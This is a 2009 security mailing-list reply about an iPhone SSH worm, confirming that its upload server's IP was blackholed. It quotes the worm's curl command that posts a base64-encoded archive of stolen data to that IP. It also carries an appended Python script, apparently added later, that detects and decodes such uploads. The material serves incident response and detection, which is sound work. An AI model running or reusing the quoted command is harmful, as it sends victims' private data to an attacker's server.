[nsp-sec] iPhone worm: Confirmed - possibly steals SMS messages.
Tim Wilde
twilde at cymru.com
Fri Nov 20 09:29:10 EST 2009
On 11/20/2009 8:56 AM, Scott A. McIntyre wrote:
> However, it does grab other data and upload it:
>
> curl 92.61.38.16/xml/a.php?name=$ID --data "data=`base64 -w 0 ${ID}.tgz| sed -e 's/+/%plu/g'`"
>
> I've asked Team Cymru to blackhole that IP address, I've already done so here.
>
> AS | IP | AS Name
> 47205 | 92.61.38.16 | HOSTEX HOSTEX autonomous system
Hey Team,
The IP has been added to the DDoS-RS list, you can see its entry in
ddos-rsv2.txt:
# ASN | Description | IP | Prot | Port | Added | Expires | Cat | S | W | Comments
47205 | HOSTEX HOSTEX autonomous system | 92.61.38.16 | tcp | 80 | 2009-11-20 13:39:15 | 2009-11-28 13:39:15 | botweb | 0 | 0 | iPhone SSH Worm
And if you're peering with the DDoS-RS you should already be getting the
route.
Thanks,
Tim
--
Tim Wilde, Senior Software Engineer, Team Cymru, Inc.
twilde at cymru.com | +1-630-230-5433 | http://www.team-cymru.org/
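As an added example (not part of the original thread and not Team Cymru's tooling), the following Python flags requests that match the quoted upload command in proxy logs and reverses its `%plu` base64 encoding so a captured request body can be inspected. The log line format, the sample lines, the `name` value and the sample payload are constructed assumptions.

```python
import base64
from urllib.parse import parse_qs, urlsplit

EXFIL_HOST = "92.61.38.16"   # IP from the message above
EXFIL_PATH = "/xml/a.php"    # path from the quoted curl command

def find_exfil_requests(log_lines):
    """Return (timestamp, client, method, name) for requests to the upload URL.

    Assumed log format (constructed): "<timestamp> <client-ip> <method> <url> <status>".
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line, skip
        ts, client, method, url = parts[:4]
        u = urlsplit(url)
        if u.hostname != EXFIL_HOST or u.path != EXFIL_PATH:
            continue
        name = parse_qs(u.query).get("name", [""])[0]
        hits.append((ts, client, method, name))
    return hits

def decode_exfil_body(body):
    """Recover the uploaded bytes from a captured body: data=<base64, '+' sent as '%plu'>."""
    if not body.startswith("data="):
        raise ValueError("body does not start with data=")
    b64 = body[len("data="):].replace("%plu", "+")
    return base64.b64decode(b64, validate=True)

def looks_like_gzip(blob):
    """The upload is a .tgz, so decoded bytes should start with the gzip magic."""
    return blob[:2] == b"\x1f\x8b"

# Constructed sample data (not real captures, not a valid archive beyond the magic bytes).
SAMPLE_ARCHIVE = b"\x1f\x8b\x08" + b"\xfb\xef\xbe" + b"constructed!"
SAMPLE_BODY = "data=" + base64.b64encode(SAMPLE_ARCHIVE).decode().replace("+", "%plu")
SAMPLE_LOG = [
    "2009-11-20T13:05:11Z 10.0.0.23 POST http://92.61.38.16/xml/a.php?name=CONSTRUCTED-ID 200",
    "2009-11-20T13:05:12Z 10.0.0.40 GET http://example.com/index.html 200",
    "2009-11-20T13:06:02Z 10.0.0.23 GET http://example.com/xml/a.php?name=x 200",
]

if __name__ == "__main__":
    for hit in find_exfil_requests(SAMPLE_LOG):
        print("possible upload:", hit)
    print("gzip payload:", looks_like_gzip(decode_exfil_body(SAMPLE_BODY)))
```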